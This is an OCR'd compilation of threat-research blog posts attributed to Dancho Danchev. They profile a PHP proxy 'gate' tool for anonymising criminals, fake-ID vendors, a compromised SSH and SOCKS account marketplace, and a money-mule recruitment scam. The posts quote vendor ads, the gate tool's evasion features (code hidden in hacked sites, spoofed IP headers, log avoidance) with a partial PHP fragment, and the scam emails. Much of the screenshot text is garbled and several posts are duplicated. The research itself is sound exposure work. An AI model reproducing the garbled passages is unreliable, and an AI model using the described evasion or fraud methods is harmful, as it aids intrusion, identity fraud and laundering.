weir eens co Aina 


Intermediate gates will be used in random order, however the final gate will be 


permanent 
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Gate URL: Fad http://www.site.com/gate.php 
Example: http: //www.site.com/gate.php 


Password: J? 123 Key: ip R9pUcXTFo4v9y 
Example: 123 Example: H4n0Bd5p6 


Cookies: © 
Example: proxy=1; variable=value 
Set this gate active 


Insert pregenerated permutation table instead of encryption key 
Use code concealement using cookies (cookies must be set) 
Remove whitespace 


<php 


A ——— 

define( Mmpwd’, “123'); 

define pnc_key’, ‘RIpUcXTFo4v3y); 
error_reporting(~E_ALL); 


@set_time_limit(0); 
ob_implicit_flush(1); 
ignore_user_abort(0); 


header(‘Content-type: application/octet-stream); 


|) Copy code 
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@ http://www.site.com/gate.php (Pwd: 123, Key: R9p... 
O http://www.site2.com/ (Pwd: passwOrd, Key: JOZGq... 
@ http://www.site3.com/gate.php (Pwd: qwerty, Key:... 
@ https://www.site4.com/images/a.php (Pwd: rfvtgb, ... 
| @https://www.site5.com/config.php (Pwd: 123456789... 


@® Check selected Target host: http://google.com Select all 
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123.456.789.123 
http://google.com 
Browser 1.0 

Lk} X-Real-Ip 255.255.255.255 

El [g} Cookie var=secret 


Header: X-Forwarded-For + Target hosts: 


Target hosts 
ya.ru;google.ru;ask.com 


site.com;site2.com 


site2.com 


mysite.org 


Value: = 255.255.255.255 


Fins oa [RO 


The application’s author is also known to have been released custom builds for various 


cybercrime-friendly forums: 
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Gate URL Password Key Cookies 
re 


gp Add | // Edit | 5¢ Delete Tools | gG&Mode | %X Settings 
-———— Network information 
Downloaded (MiB): 0.000 DL speed (KiB/s): 0 Open sockets: 0 
Uploaded (MiB): 0.000 UL speed (KiB/s): 0 Sent requests: 0 


Request rofing 


Some of its core features include: 

[+] HTTPS support for php-gates, needs OpenSSL 

[+] Ability to set a password on the gate. 

[+] Ability to work with a gate, through any procs (HTTP (S), SOCKS4, SOCKS5). 

[+] Working with gated exclusively via the method GET, which provides protection from 
detection by the log files on the server. 

[+] Ability to set Cookies, transferred during handling to the gate. This is useful for hiding the 
code in the files of the site gate. Format: "cookie = value; cookie2 = ;" 

[+] Processing of each compound is in a separate stream. 

[+] Ability to unlimited downloads and uploads of large files (in case of inability to bypass 
restrictions set _time _limit () can download files in a few times, provided support to resume 
from the target server). 

[+] Preprocessing mechanism optimizes queries under HTTP 1.0. 

[+] The presence of an encryption key must be specified (purely symbolic encryption to hide 
traffic from prying eyes), and all data, including the password for the gate are transmitted in 
encrypted form. Enable / disable the encryption does not require editing the code gate. 

[+] Ability to work with several gates. In this case, each assigned a specific gated User-Agent 
(assigned by chance) that does not allow the target site to link together the requests from 
different gates. 

[+] Ability to add a request to the target site header X-Forwarded-For, X-Real-lp and Via with 
random IP-addresses (in this case, sites that use mechanisms for determining the visitor’s IP 
address on these titles or used mod __realip, will benefit from logging bogus addresses, as 
these headlines mislead the site administrator). 

[+] Ability to select the interface to listen to. 

[+] More statistics on network connections, there are different levels of profiling queries (and 
no logs are written to the file). 
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[+] Support chains gates. 

[+]-Chain of 3 modes: 

- Direct sequence (traffic passes through a series of gates that you clearly stated) 

- Random chain (each request is passed through a randomly builds a chain of gates) 

- Casual chain with specific output gate time (similar to the previous mode, except that the 
final gate remains constant. 

[+] Ability to speed up surfing through the chain by local caching IP-addresses. 

[+] Support for HTTPS gates are not independent of their number. 

[+] Using a cascade encryption - the ability to use any number of gates with different encryp- 
tion keys. 

[+] Built-checker gates. 

[+] You can check all the gates at once, or each gate individually when adding / editing. 

[+] Built-in gates. 

[+] Ability to insert code in the gate pre-generated table of permutations. This eliminates the 
need to store the encryption key directly to the Gate, and generate a table for each access to 
the gate. 

[+] Automate the process of creating a masked gate with Cookies 

[+] Ability to delete from the code perevodoa lines and tabs. 

[+] Ability to set proivolnyh request headers. 

[+] Ability to define hosts, which will be sent to a specific heading. 

[+] Ability to temporarily activate / deactivate a specific heading. 

[+] Gain Control key to 2048 bits (256 bytes) using md5 

[+] Complete independence from each other bytes (including the order of the bytes and 
encrypted block length). 

[+] The variable number of rounds of permutations, depending on the key. 

[+] Partly salt as XOR’a-byte hash key. 


With the ease of assessing a malware-infected host’s bandwidth thanks to the overall 
availability of such an option among the most popular managed services offering access to 
such hosts, it shouldn’t be surprising to consider that a potential cybercriminal using this 
application, would be in a perfect position to create - [8]in a DIY fashion - a stable anonymous 
network, to further assist him on his way to achieve his fraudulent or purely malicious 
objectives. 


The bottom line? What’s the cost of anonymizing a cybercriminal’s Internet activities? 
1,900 rubles or $57.53 for the application, in this particular case. 


This post has been reproduced from [9]Dancho Danchev’s blog. Follow him 
[10]Jon Twitter. 


ttp://ddanchev. blogspot .com/2008/10/cost-of-anonymizing-cybercriminals.htm 
ttp://ddanchev.blogspot.com/2009/02/cost-of-anonymizing-cybercriminals.htm 


ttp://ddanchev. blogspot .com/2008/02/malware-infected-hosts-as-stepping. htm 


ttp://blog.webroot . com/2013/03/20/hacked-pcs-as-anonymization-stepping-stones-service-operates- in-the-op 


en-since-2004/ 
6 


ttp://blog.webroot . com/2013/08/02/malware- infected-hosts-as-stepping-stones-service-offers-access-to-hu 


1. 
2: 
3. http: //ddanchev. blogspot .com/2010/07/cybercriminals-sql-inject-cybercrime.htm 
4. 
5. 


dreds-of-compromised-u-s-based-hosts/ 


7. bhttp://blog. webroot .com/2012/03/02/new-service-converts-malware-infected-hosts-into-anonymization-proxies 
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8. http://blog.webroot .com/tag/diy/ 
9. http: //ddanchev. blogspot .com/ 
10. http://twitter.com/danchodanche 


9.8.6 Vendor of Scanned Fake IDs, Credit Cards and Utility Bills Targets the French 
Market Segment (2013-08-22 18:19) 


Continuing the series of blog posts detailing the very latest effi- 
ciency/quality/scalability/universal business concepts oriented underground market proposi- 
tions for fake IDs, credit cards and utility bills, in this post I'll discuss an example of market 
segmentation in terms of supplying them, through an ad targeting potential cybercriminals 
based in France, or international cybercriminals wanting to enter the French market. 


Catch up with previous research on the topic: 


¢ [1]Newly Launched ’Scanned Fake Passports/IDs/Credit Cards/Utility Bills’ Service Random- 
izes and Generates Unique Fakes On The Fly 


¢ [2]A Peek Inside the Russian Underground Market for Fake Documents/IDs/Passports 


What’s so special about this underground market proposition, anyway? It’s the market 
segmentation taking place through the eyes of the vendor, as well as the diversity of scanned 
.PSD Photoshop templates, the non-modifiable scanned documents, and the actual availability 
of physical fake IDs, all of them exclusively targeting the French market segment. 


Sample screenshot of the advertisement: 
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Prem; 4060 


0» Mothodes de patemerts « - ~ 


Perfect Money® 


sceowy 


eee Contact eee 


$3 


There are several types of vendors contributing to the currently mature state of the market 
for fake IDs/documents, or to the cybercrime ecosystem in general. Let’s discuss the most 
popular types of market players. 


Among the rarest type of such vendors is the experienced one who tends not to adver- 
tise at public or commercially accessible cybercrime-friendly communities. Although it would 
seem fairly logical to assume that the applied OPSEC (Operational Security) would be directly 
proportional with the decrease in processed orders since it would limit the visibility of his 
services within the cybercrime ecosystem, that’s not necessarily the case when quality, 
experience, sophisticated, and, of course, high profit margins based on perceived value come 
into play. In between the lack of mass advertisements, the vendor would also not list his 
contact details, and would only do business with cybercriminals with proven reputation within 
not just the community in question, but also, across the entire ecosystem. 


Next are those vendors who'd sacrifice OPSEC, for the sake of reaching as many cus- 
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tomers as possible in an attempt to monetize this market ’touch point’ with other prospective 
cybercriminals. They advertise on public and on commercially accessible cybercrime-friendly 
communities, usually have a decent reputation, with generally positive feedback from their 
customers, and of course, never fail to ‘deliver’ what they pitch. 


There’s yet another type of such vendors, worth discussing. It’s those who ‘populate’ a 
newly launched community with their propositions, and most often target novice cybercrim- 
inals with zero understanding of cybercrime ecosystem reputation dynamics, who are still 
looking to purchase this desired, but largely commoditized underground market good. 


With more vendors of fake IDs/documents popping up across the entire ecosystem, the 
series of blog posts profiling their activities, are prone to expand. 


This post has been reproduced from [3]Dancho Danchev’s blog. Follow him 
[4]Jon Twitter. 


1. http: //ddanchev. blogspot .com/2013/07/newly-launched-scanned-fake.htm 

2. http: //ddanchev. blogspot .com/2013/05/a-peek- inside-russian-underground. htm 
3. http: //ddanchev. blogspot .com/ 

4. 


http: //twitter.com/danchodanche 


9.8.7 Vendor of Scanned Fake IDs, Credit Cards and Utility Bills Targets the French 
Market Segment (2013-08-22 18:19) 


Continuing the series of blog posts detailing the very latest effi- 
ciency/quality/scalability/universal business concepts oriented underground market proposi- 
tions for fake IDs, credit cards and utility bills, in this post I’ll discuss an example of market 
segmentation in terms of supplying them, through an ad targeting potential cybercriminals 
based in France, or international cybercriminals wanting to enter the French market. 


Catch up with previous research on the topic: 


¢ [1]Newly Launched ’Scanned Fake Passports/IDs/Credit Cards/Utility Bills’ Service Random- 
izes and Generates Unique Fakes On The Fly 


¢ [2]A Peek Inside the Russian Underground Market for Fake Documents/IDs/Passports 


What’s so special about this underground market proposition, anyway? It’s the market 
segmentation taking place through the eyes of the vendor, as well as the diversity of scanned 
.PSD Photoshop templates, the non-modifiable scanned documents, and the actual availability 
of physical fake IDs, all of them exclusively targeting the French market segment. 


Sample screenshot of the advertisement: 
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There are several types of vendors contributing to the currently mature state of the market 
for fake IDs/documents, or to the cybercrime ecosystem in general. Let’s discuss the most 
popular types of market players. 


Among the rarest type of such vendors is the experienced one who tends not to adver- 
tise at public or commercially accessible cybercrime-friendly communities. Although it would 
seem fairly logical to assume that the applied OPSEC (Operational Security) would be directly 
proportional with the decrease in processed orders since it would limit the visibility of his 
services within the cybercrime ecosystem, that’s not necessarily the case when quality, 
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experience, sophisticated, and, of course, high profit margins based on perceived value come 
into play. In between the lack of mass advertisements, the vendor would also not list his 
contact details, and would only do business with cybercriminals with proven reputation within 
not just the community in question, but also, across the entire ecosystem. 


Next are those vendors who'd sacrifice OPSEC, for the sake of reaching as many cus- 
tomers as possible in an attempt to monetize this market ’touch point’ with other prospective 
cybercriminals. They advertise on public and on commercially accessible cybercrime-friendly 
communities, usually have a decent reputation, with generally positive feedback from their 
customers, and of course, never fail to ‘deliver’ what they pitch. 


There’s yet another type of such vendors, worth discussing. It’s those who ‘populate’ a 
newly launched community with their propositions, and most often target novice cybercrim- 
inals with zero understanding of cybercrime ecosystem reputation dynamics, who are still 
looking to purchase this desired, but largely commoditized underground market good. 


With more vendors of fake IDs/documents popping up across the entire ecosystem, the 
series of blog posts profiling their activities, are prone to expand. 


1. http: //ddanchev. blogspot .com/2013/07/newly-launched-scanned-fake.htm 
2. http: //ddanchev. blogspot .com/2013/05/a-peek- inside-russian-underground. htm 


9.8.8 The Cost of Anonymizing a Cybercriminal’s Internet Activities - Part Four 
(2013-08-23 17:16) 


Continuing the "The Cost of Anonymizing a Cybercriminal’s Internet Activities" series, in this 
post, I’ll profile an APl-supporting, blackhat SEO-friendly vendor of anonymization services, 
which is currently offering hundreds of thousands of compromised SSH accounts, HTTP/HTTPs 
based (compromised) proxies, and the ubiqutous for the cybercrime ecosystem, Socks 4/5 
servers. 


Catch up with related research on the topic: 


¢ [1]The Cost of Anonymizing a Cybercriminal’s Internet Activities - Part Three 
e [2]The Cost of Anonymizing a Cybercriminal’s Internet Activities 

¢ [3]The Cost of Anonymizing a Cybercriminal’s Internet Activities - Part Two 

¢ [4]Cybercriminals SQL Inject Cybercrime-friendly Proxies Service 

¢ [5]Malware Infected Hosts as Stepping Stones 


¢ [6]Hacked PCs as ‘anonymization stepping-stones’ service operates in the open since 
2004 
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¢ [7]‘Malware-infected hosts as stepping stones’ service offers access to hundreds of com- 
promised U.S based hosts 


¢ [8]New service converts malware-infected hosts into anonymization proxies 


The service is currently offering access to 180,331 compromised SSH accounts, 9597 
HTTP/HTTPS proxies, and 110,185 (compromised) Socks servers located virtually all over the 
World. 


How are they gaining access to this accounting data in the first place? Despite the overall 
availability of brute-forcing tools, in 2013, one of the most popular tactic for obtaining 
stolen/compromised accounting data, remains the practice of ‘data mining’ a botnet’s already 
infected ‘population’ for virtually anything kind of accounting data, to be later on monetized 
through multiple distribution/abuse channels. 


Sample screenshots of the anonymization service: 


4 NoLogins 180331 


s HTTP/HTTPS Proxy (NEW!) 9597 
s Socks 110185 
& Your info- P: 


nm Free socks every—day 


Plans v Daily Limit v Time v Price v 
Demo 5 NoLogins / Day 1 Day FREE 
Small User 50 NoLogins / Day 30 Days $15 USD 
Basic User 150 NoLogins / Day 30 Days $35.00 USD 
Power User 300 NoLogins / Day 30 Days $65.00 USD 
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Mozilla Firefox 7 =18)x/ 
fle Edt Yew History ockmarks Tools Help 


C—O, ae | xi 


CC _—_ ¢) | 8- f) + #\° 


# Http/Https proxy ( 


ts VOO101) @ CNQITS) & UOT = co7e) 

68 P661) ) i mviss) 
TE Ne 
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mA?) 
BMOe 
am wMC 
sow 
oe TX 


a2 
“ 
= 
“ 
= 
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sue@On usd 


isp egicomcast.verizon) geo code Geo Tone gee city 


xy list (or SEQESM | ison | rext-plain | 


128 


20477" 


80 shart Roxy 


oa 15.161." 


wae nnn a sas v< Pistia Rana — Pans Gondainn Vionamiale - PF = 
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SOCKS } HTTP Proxy Forwarding Now you can start ssh 


} tunnel. 
Listen Irterface | 127.0.0.1 
Listen Port [1080 
Server Bind Interface | 0.0.0.0 


T Specify Server Public IP 


-—— 


Not listed on * 37.105.***. block.dnsbl.sorbs.net! 


Not listed on ***.237.105.***.blackholes.wirehub.net! 


=ioix 
Profile: (default profile) 


Login | options | Terminal | Remote Desktop | SFTP | Services| C25 | sac | ssH | About | 
28 Server Authentication 
Load profie 4) 105.237. Gana odmen 
2 Port 22 Intial method [password >] 


‘ Proxy settinos thaet bey pan soer 
Save profile as ‘ ; veeee 
a 
I~ Store encrypted password in profile 


[~ sSPijKerberosS fF 


411:47:08.140 2 chent, 
¢ imiked, 
\ mR Ire Wei Dai 


4)11:47:08.140 Vist www.bitvise.com for latest information about our SSH2 products. 
411:47:08.140 Run 'BySsh -help' to learn the supported command-line parameters. 
4)11:47:08.328 Loading defaut profile 


C_tson ex | 


Sample screenshots of the API in action: 
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’ 
4 ~ webmoney 


Managed SOCKS API Reque 
Connect . 
US (5054) . 
California (2081) - 
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Was viewed [X] days ago ~ 


29 - webmo 
> weomoney 
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What’s also worth emphasizing on is the fact, that, the service is not just targeting potential 
cybercriminals wanting to anonymize their Internet activities, but also, [9]black hat SEO 
monetizers, who now have access to hundreds of thousands of fresh Socks servers for the 
purpose of abusing them on their way to monetize their fraudulent/malicious campaigns. 


[10]Vertical market integration, or the one-stop-shop market model, has always been 
an inseparable part of the cybercrime ecosystem, as it increases the probability that a 
cybercriminal’s one-stop-shop would immediately occupy a larger market share within the 
cybercrime ecosystem, consequently resulting in more revenue from the facilitation of fraudu- 
lent and malicious activity. 


Some of the most popular instances of this trendy business concept applied by cyber- 
criminals internationally, include but are not limited to the following real-life underground 
market propositions: 


¢ A vendor of [11]mobile spamming services would not only offer the actual spamming 
process, but also, offer harvested mobile mobile numbers as a value-added service, next 
to the on demand harvesting of mobile numbers for any given geographical region. 


¢ A vendor of [12]managed spam services, would also offer the option to buy segmented 
and geolocated, as well as often validated, email addresses, with the ability to perform 
custom harvesting for any given country 


¢ A [13]vendor of managed iFraming platform would also offer access to hijacked traffic 
to be automatically converted to malware-infected hosts through the platform, with addi- 
tional services including as for instance, managed crypting of the iFrame/malicious script 
in real-time 


¢ An [14]author of Web malware exploitation kit, would be also offering managed 
iFrame/script crypting services next to bulletproof hosting in case the customer desires 
those 


The cost of anonymizing a cybercriminal’s Internet activities in this particular case? The price 
is shaped based on the anonymization method of choice. 


This post has been reproduced from [15]Dancho Danchev’s blog. Follow him 
[16]Jon Twitter. 


http: //ddanchev. blogspot .com/2013/08/the-cost-of-anonymizing-cybercriminals.htm 


ttp://ddanchev. blogspot .com/2008/10/cost-of-anonymizing-cybercriminals.htm 


. http: //ddanchev. blogspot .com/2009/02/cost-of-anonymizing-cybercriminals .htm 


http: //ddanchev. blogspot .com/2010/07/cybercriminals-sql-inject-cybercrime.htm 


. http: //ddanchev. blogspot .com/2008/02/malware-infected-hosts-as-stepping.htm 


http: //blog.webroot.com/2013/03/20/hacked-pcs-as-anonymization-stepping-stones-service-operates-in-the-op 


en-since-2004/ 


7. http://blog.webroot.com/2013/08/02/malware-infected-hosts-as-stepping- stones-service-offers-access-to-h 


dreds-of-compromised-u-s-based-hosts/ 


8. http: //blog.webroot .com/2012/03/02/new- service-converts-malware-infected-hosts-into-anonymization-proxies 


/ 
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9. http: //ddanchev. blogspot .com/2013/04/whats-roi-on-going-to-virtual-blackhat .htm 
10. http://blog. webroot. com/2013/01/08/black-hole-exploit-kit-authors-vertical-market-integration-fuels-gro 
th-in-malicious-web-activity/ 


11. http://blog. webroot .com/2012/05/07/managed- sms- spamming-services-going-mainstream/ 


ttp://blog.webroot .com/2012/05/17/a-peek- inside-a-managed- spam-service/ 


http: //blog.webroot.com/2013/06/03/compromised-ftpssh-account-privilege-escalating-mass- iframe-embeddi 


13. 
g-platform-released-on-the-underground-marketplace/ 


3 
14. http://blog. webroot .com/2013/01/08/black-hole-exploit-kit-authors-vertical-market-integration-fuels-gro 


th-in-malicious-web-activity/ 


15. http://ddanchev. blogspot .com/ 
16. http://twitter.com/danchodanche 


9.8.9 Cybercriminals Offer High Quality Plastic U.S Driving Licenses/University ID 
Cards (2013-08-29 02:26) 


Continuing the series of blog posts profiling the most recent underground market propositions 
for high quality fake passports/IDs/documents, in this post, I’ll emphasize on a cybercrime- 
friendly vendor that’s exclusively targeting the U.S market. 


Go through previous research into the market for fake passports/IDs/documents: 


¢ [1]Newly Launched 'Scanned Fake Passports/IDs/Credit Cards/Utility Bills’ Service Random- 
izes and Generates Unique Fakes On The Fly 


e [2]A Peek Inside the Russian Underground Market for Fake Documents/IDs/Passports 


¢ [3]Vendor of Scanned Fake IDs, Credit Cards and Utility Bills Targets the French Market 
Segment 


Offering fake plastic driving licenses for over 25+ U.S States, including student IDs for major 
U.S Universities for a static price of $150, the vendor not just currently outperforms competing 
vendors in terms of quality in this particular market segment - within the cybercrime-friendly 
community in question - but also, is already receiving recommendations from other cyber- 
criminals to raise the price of his underground market ‘asset’, indicating penetration pricing in 
action. 


Payment methods accepted? Bitcoin, Western Union and Moneygram. 


Sample underground market ad: 

[VENDOR’s NAME REDACTED] has over 25+ states on tap, along with ‘secondaries’ to offer, 
all of of which and are high quality, meaning in-state without issue, in most cases. All IDs 
contain UV (where applicable as some states don’t), multispec-hologram, 1D/2D barcode 
and/or magstripe that will scan/swipe to read DMV/AAMVA license standard. 


The vendor is requiring the following data from his potential customers: 
Name - First, MI, Last 

Address 

DOB 

Sex 
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Hair Color 

Height 

Weight 

Eye color 

Driver License number - if a number isn’t provided one will be randomly generated 
Endorsements and/or Restrictions - if not included these will be left blank 

Scanned signature - if not provided you will receive a generic font signature 


***4** More\Less info may be required depending on the state requested 
Scanned passport picture - no webcam pictures can be accepted. 


If you cannot get a real passport picture and have a decent camera, please take a pic 
from the chest up against a white background/drywall with the flash ’ON’. | will handle the 
cropping aspect. Also try to have good lighting and when scanning use high resolution. You 
may also upload a signature. | ask that this be written using a black sharpie style pen to 
achieve the best results. 


You may upload this info to sendspace.com or the file-sharing site of your choosing and 
forward me the download link. | will confirm reception via email and you order will begin 
processing. All IDs are 150USD with incentive to group buys. Payment can be made via BTC, 
WU, Moneygram. Payment will be collected upon completion and approval of your order. 


Sample screenshots of the service’s current ’inventory’: 
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The market for fake passports/IDs/documents is prone to flourish, as more cybercriminals 
demand both, scanned, and plastic fake IDs to be later one abused in related fraudulent 
schemes. Naturally, the market is quick to supply, and those who excel in their Operational 
Security and quality of the underground market ‘assets’, will begin occupying a decent market 
share within this underground market segment. 


This post has been reproduced from [4]Dancho Danchev’s blog. Follow him 
[5]Jon Twitter. 


1 
2 

3. http: //ddanchev. blogspot . com/2013/08/vendor-of-scanned-fake-ids-credit-cards.htm 
a 

5. 


9.8.10 Cybercriminals Offer High Quality Plastic U.S Driving Licenses/University ID 
Cards (2013-08-29 02:26) 


Continuing the series of blog posts profiling the most recent underground market propositions 
for high quality fake passports/IDs/documents, in this post, I’ll emphasize on a cybercrime- 
friendly vendor that’s exclusively targeting the U.S market. 
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Go through previous research into the market for fake passports/IDs/documents: 


¢ [1]Newly Launched ’Scanned Fake Passports/IDs/Credit Cards/Utility Bills’ Service Random- 
izes and Generates Unique Fakes On The Fly 


¢ [2]A Peek Inside the Russian Underground Market for Fake Documents/IDs/Passports 


¢ [3]Vendor of Scanned Fake IDs, Credit Cards and Utility Bills Targets the French Market 
Segment 


Offering fake plastic driving licenses for over 25+ U.S States, including student IDs for major 
U.S Universities for a static price of $150, the vendor not just currently outperforms competing 
vendors in terms of quality in this particular market segment - within the cybercrime-friendly 
community in question - but also, is already receiving recommendations from other cyber- 
criminals to raise the price of his underground market ‘asset’, indicating penetration pricing in 
action. 


Payment methods accepted? Bitcoin, Western Union and Moneygram. 


Sample underground market ad: 


[VENDOR’s NAME REDACTED] has over 25+ states on tap, along with ‘secondaries’ to 
offer, all of of which and are high quality, meaning in-state without issue, in most cases. All 
IDs contain UV (where applicable as some states don’t), multispec-hologram, 1D/2D barcode 
and/or magstripe that will scan/swipe to read DMV/AAMVA license standard. 


The vendor is requiring the following data from his potential customers: 


Name - First, MI, Last 

Address 

DOB 

Sex 

Hair Color 

Height 

Weight 

Eye color 

Driver License number - if a number isn’t provided one will be randomly generated 
Endorsements and/or Restrictions - if not included these will be left blank 
Scanned signature - if not provided you will receive a generic font signature 
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** More\Less info may be required depending on the state requested 
Scanned passport picture - no webcam pictures can be accepted. 


If you cannot get a real passport picture and have a decent camera, please take a pic 
from the chest up against a white background/drywall with the flash ’ON’. | will handle the 
cropping aspect. Also try to have good lighting and when scanning use high resolution. You 
may also upload a signature. | ask that this be written using a black sharpie style pen to 
achieve the best results. 


You may upload this info to sendspace.com or the file-sharing site of your choosing and 
forward me the download link. | will confirm reception via email and you order will begin 


processing. All IDs are 150USD with incentive to group buys. Payment can be made via BTC, 
WU, Moneygram. Payment will be collected upon completion and approval of your order. 


Sample screenshots of the service’s current ’inventory’: 
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The market for fake passports/IDs/documents is prone to flourish, as more cybercrimi- 
nals demand both, scanned, and plastic fake IDs to be later one abused in related fraudulent 
schemes. Naturally, the market is quick to supply, and those who excel in their Operational 
Security and quality of the underground market ‘assets’, will begin occupying a decent market 
share within this underground market segment. 


1. http: //ddanchev. blogspot .com/2013/07/newly-launched-scanned- fake. htm 
2. http: //ddanchev. blogspot .com/2013/05/a-peek- inside-russian-underground. htm 


3. http: //ddanchev. blogspot .com/2013/08/vendor-of-scanned-fake-ids-credit-cards.htm 


9.8.11 Profiling a Novel, High Profit Margins Oriented, Legitimate Companies Brand- 
Jacking Money Mule Recruitment Scheme (2013-08-29 22:41) 


Over the years, I’ve been actively researching the money mule recruitment epidemic, pro- 
viding actionable (real-time/historical) intelligence on their activities, exposing [1]their DNS 
infrastructure, offering exclusive peek inside [2]the Administration Panels utilized by money 
mules, emphasizing on current and emerging tactics applied by the individuals orchestrating 
the final stages of a fraudulent operation - the cash out process through basic risk-forwarding. 
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Catch up with previous research on the money mule recruitment problem: 


¢ [3]Spotted: cybercriminals working on new Western Union based ‘money mule manage- 
ment’ script 


¢ [4]Keeping Money Mule Recruiters on a Short Leash - Part Eleven 

¢ [5]Keeping Money Mule Recruiters on a Short Leash - Part Ten 

¢ [6]Keeping Money Mule Recruiters on a Short Leash - Part Nine 

¢ [7]Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT 
¢ [8]Keeping Money Mule Recruiters on a Short Leash - Part Seven 

¢ [9]Keeping Money Mule Recruiters on a Short Leash - Part Six 

¢ [10]Keeping Money Mule Recruiters on a Short Leash - Part Five 

¢ [11]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
¢ [12]Keeping Money Mule Recruiters on a Short Leash - Part Four 

¢ [13]Money Mule Recruitment Campaign Serving Client-Side Exploits 

e [14]Keeping Money Mule Recruiters on a Short Leash - Part Three 

¢ [15]Money Mule Recruiters on Yahoo!’s Web Hosting 

¢ [16]Dissecting an Ongoing Money Mule Recruitment Campaign 

¢ [17]Keeping Money Mule Recruiters on a Short Leash - Part Two 

¢ [18]Keeping Reshipping Mule Recruiters on a Short Leash 

¢ [19]Keeping Money Mule Recruiters on a Short Leash 

¢ [20]Standardizing the Money Mule Recruitment Process 

¢ [21]lnside a Money Laundering Group’s Spamming Operations 

¢ [22]Money Mule Recruiters use ASProx’s Fast Fluxing Services 


¢ [23]Money Mules Syndicate Actively Recruiting Since 2002 


In this post, I’ll profile a novel money mule recruitment scheme, that involves high profit mar- 
gins - of course for the ones organizing the scheme - through a direct, and most importantly, 
(pseudo) legal brand-jacking of a gullible business owner’s brand name, enticing him/her into 
opening a merchant account for processing E-commerce transactions, coming from more 
gullible and socially engineered mules. 


It all begins with an email coming from a non-existent "environmental enterprise", that 
in this particular case is abusing Google’s brand in an attempt to increase the probability of a 
successful interaction with the socially engineered business owners: 


Sample email: 
4733 


Environmental enterprise searching for representation internationally 
5 % commission on 200K cash flow originated from promotion and sales of proprietary 
research articles 


Necessary conditions: 
- Own a company - Be reachable on daily basis through E-mail, phone or Skype - Proper 
execution of all planned undertakings 


In case if being interested, please provide: 
- Name and Surname - Age - Telephone number (including country code) - City and Country - 
Email 


Please answer to: NAME@googleapp-consult.com 


Faithfully yours, 
HR dept 


Those who reply are kindly asked to open a merchant bank account using their own 
company data, and assured that, despite the fact that the Web site which will be selling 
the bogus ‘research articles’ will be using their (legitimate) business brand’s name and 
contact details, they will still receive their 5 % commission on a 200,000/250,000 EUR in 
anticipated revenue, which would naturally be coming directly from other mules participating 
in the fraudulent scheme. Moreover, despite that a business owner will have his company 
brand, logo, contact information listed at the Web site, he/she will have zero visibility to the 
non-existent purchasing process of this research, as "all customer service, sales, technical 
logistics, etc. are to be handled by us." 


Why would a potential cybercrime syndicate want a socially engineered business owner 
to open a merchant bank account using his/her own data? Pretty simple. In my previous 
research on [24]the standardization of the money mule recruitment process, | emphasized on 
how money mules are often vetted through online-based surveys, which always ask important 
from a mule recruiter’s perspective question, such as - when did you you first open your bank 
account, and do you have any limitations on incoming/ongoing monetary transactions on it? 


However, an established company would always benefit from the trust it has already es- 
tablished with its financial institution/service of choice, meaning that, it will not only get its 
merchant account open, but also, will successfully pass the majority of verification protection 
mechanisms for high volume transactions put into the place by the financial institution/service 
in place. 


Sample reply email: 
Thank you for your reply. 


We are a company involved in development, branding and launching of several web me- 
dia and IT projects involved in consulting on green technology, renewables and alternative 
energy sources. Several of the projects are being currently launched online and each one 
will need to have a card payment interface. This collaboration refers to opening a merchant 
account for online credit card acceptance (E-commerce). 


We would need your company to open a merchant account for card acceptance 
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and handle the receivables derived from the sales generated by each project. 
A bank/payment provider will facilitate data needed for website integration with their E- 
commerce payment gateway. We will handle the technical side of such integration in full. 


We will brand the website under your company, therefore the administrative 
company data listed on the website will be yours, but all customer service, tech- 
nical logistics and sales are to be handled by us. The products sold will be proprietary 
research articles and information packages on green technology, renewables and alternative 
energy sources. 


Incoming proceedings from sales will be settled by the bank (or the payment provider) 
into your business bank account on a time scale defined by the bank (or the payment 
provider). 

These sale proceedings will be transferred to us, minus your commission and expenses 
incurred. The volume of monthly payments processed through the merchant account 
will be in the order of EUR 200,000 - EUR 250,000 per month in the initial months. 
The expected rise is roughly 5-6 % every month. The commission proposed to you 
stands at 5 % of the mentioned volume. 


All the expenses related to the operation including the banking and transactions fees 
and the merchant account setup and related fees are to be covered by us. If you agree in 
principle, | will provide the contract draft to define the legal terms of our collaboration. 


Yours sincerely, 

Michael Torti 

General Manager 

ECOFIN Projects (Gibraltar) 
Tel/Fax: +350 2006 1287 


Who are ECOFIN Projects (ecofinservices.net - 50.63.220.106) ? Nothing more than [25]a 
cybercrime-friendly "marketing agency" at its best. 
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Welcome to Ecofin 


Ecofn is offering outstanding solutions which are useful in maximnizing revenues Mat are generated through 3 wide range of irwestment sectors and global assets. A wide range 
of services and financial opportunities are being offered for manufacturers, Gevelopers, owners 35 well as financial investors interested in our niche investment portfolios and 
seraces 


We are operating a5 a globally safe company as well as involving risk anc integnty management expertise thal Orings together practical experience along with cutting edge. 
innovative engineering and technologies. The company is research based which is primarily focused on environmental sectors, allemative energy, infrastructure, as well as 
lity all around the globe 


The firm is practicing a fundamental and Dasic approach while it comes to managing its Ghentele assets. Ecofin is useful in Geveloping, branding 3s well as launching exclusive 
information sates podiums based on alternative, as well a5 green technological sources along wih IT and web media themes. The company is dedicated to providing its cents 
with the highest levels of quality sermices and investment returns within he niche industries Mat we focus upon 


ecofin news 


SHOULD SUPERMARKETS CHARGE 
FOR PLASTIC BAGS? 


(a4 Denver ts the latest aty to propose measures 
to slash plastic bag use. The aty is 
considering a $-cent 


Wekome to ar wie 
atone ot 


os ~ aa = 
> 

7 NATURAL PRODUCTS TO BANISH Green web hosting | Project gearedtowards Media Content transiation services | Human 

PREGNANCY ACNE the specific purpose of combining standard translation service trom Engitsh to Spanish of 


wedsite hosting with green and renewables texts and media content (ideo, audio, 
66 When you are pregnant, your hormone levels ency by using pilot servers fed exclusively podcasts. mixed tent, etc.) with emphasys 
tend to get wacky, especially during your first by Solar powered energy on coment of technical and legal nature 


trimester as your bo 


up finar T pr t ons Ecofin Global Location 


toring s 


MYEcofin 


Ecofin Projects 


Green web hosting 


The year 2011 has turned out to be & successtul year, especially when it comes to the environment as a large number of 
companies throughout the globe has been following the ideal concept of Being Green’. Ecofin has in turn made numerous 
global companies worldwide follow ts lead converting them into Green freindly companies 


sequently, this has helped in acquiring a large consumer Base. WH a dedicated effort and commitment to being green 
everyone has preferred investing in the green technological solufens. and ultimately it was not just a single solitary firm 
working on hie idea 


AS we focus on one of our core ideals of Going a lot Detter for the enaronment today stil there is Sme when you will be able to 
have 2 Detter future by taking strong initiatives today 


